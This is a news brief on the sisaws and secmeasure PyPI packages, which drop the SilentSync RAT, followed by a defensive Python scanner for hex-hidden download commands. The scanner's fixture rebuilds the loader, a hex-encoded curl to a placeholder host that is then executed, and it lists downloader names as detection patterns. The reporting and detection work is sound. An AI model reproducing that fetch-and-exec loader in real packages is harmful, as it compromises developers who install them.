SilentSync RAT Delivered via Two Malicious PyPI Packages Targeting Python Developers
Briefly

"SilentSync is capable of remote command execution, file exfiltration, and screen capturing," Zscaler ThreatLabz's Manisha Ramcharan Prajapati and Satyam Singh said. "SilentSync also extracts web browser data, including credentials, history, autofill data, and cookies from web browsers like Chrome, Brave, Edge, and Firefox." The packages, now no longer available for download from PyPI, are listed below. They were both uploaded by a user named "CondeTGAPIS."
"If a developer imports the sisaws package and invokes the gen_token function, the code will decode a hexadecimal string that reveals a curl command, which is then used to fetch an additional Python script," Zscaler said. "The Python script retrieved from PasteBin is written to the filename helper.py in a temporary directory and executed."
Two malicious packages on PyPI, sisaws and secmeasure, were uploaded by a user named CondeTGAPIS and have since been removed from the repository. The sisaws package mimics a legitimate Argentine health system library but includes a gen_token function that decodes a hexadecimal string to reveal a curl command; that command fetches an additional Python script from PasteBin, which is written to a temporary directory as helper.py and executed. The secmeasure package masquerades as a string-cleaning security library but contains embedded functionality to drop the SilentSync RAT. SilentSync enables remote command execution, file exfiltration, screen capture, and extraction of browser credentials, history, autofill data, and cookies on Windows systems.
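As an added defensive example (not code from the Zscaler report or The Hacker News article), the following Python script statically scans a module's source for the loader pattern described above: a hex string literal that decodes to a download command, combined with dynamic execution. The SAMPLE_SOURCE fixture and its placeholder URL are constructed for this example and are not the real package code.

```python
import ast
import re

# Constructed fixture mirroring the described pattern: a hex literal that is
# decoded at call time into a curl command, then executed. Placeholder URL.
SAMPLE_SOURCE = '''
import subprocess, tempfile, os

def gen_token(dni):
    cmd = bytes.fromhex("%s").decode()
    out = os.path.join(tempfile.gettempdir(), "helper.py")
    subprocess.run(cmd, shell=True)
    exec(open(out).read())
''' % "curl -s https://example.invalid/raw/PLACEHOLDER".encode().hex()

# Downloader or interpreter names that, once decoded from hex, are a red flag.
COMMAND_PATTERNS = re.compile(r"\b(curl|wget|powershell|bash|sh)\b", re.I)
# Call names that execute code or shell commands (builtins, os, subprocess).
EXEC_CALLS = {"exec", "eval", "system", "run", "Popen", "call", "check_output"}


def find_hidden_commands(source):
    """Return (lineno, decoded) for hex string literals decoding to commands."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            s = node.value
            if len(s) >= 8 and len(s) % 2 == 0 and re.fullmatch(r"[0-9a-fA-F]+", s):
                try:
                    decoded = bytes.fromhex(s).decode("utf-8")
                except (ValueError, UnicodeDecodeError):
                    continue
                if COMMAND_PATTERNS.search(decoded):
                    findings.append((node.lineno, decoded))
    return findings


def uses_dynamic_execution(source):
    """True if the module calls exec/eval or an os/subprocess execution helper."""
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            f = node.func
            name = f.id if isinstance(f, ast.Name) else getattr(f, "attr", None)
            if name in EXEC_CALLS:
                return True
    return False


def triage(source):
    """Flag a module only when both signals are present together."""
    hidden = find_hidden_commands(source)
    dyn = uses_dynamic_execution(source)
    return {"hidden_commands": hidden, "dynamic_exec": dyn, "suspicious": bool(hidden) and dyn}


if __name__ == "__main__":
    print(triage(SAMPLE_SOURCE))
```

Running this against the fixture reports the hex literal on line 5 decoding to the placeholder curl command together with dynamic execution; a plain string-cleaning function produces no findings.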
Read at The Hacker News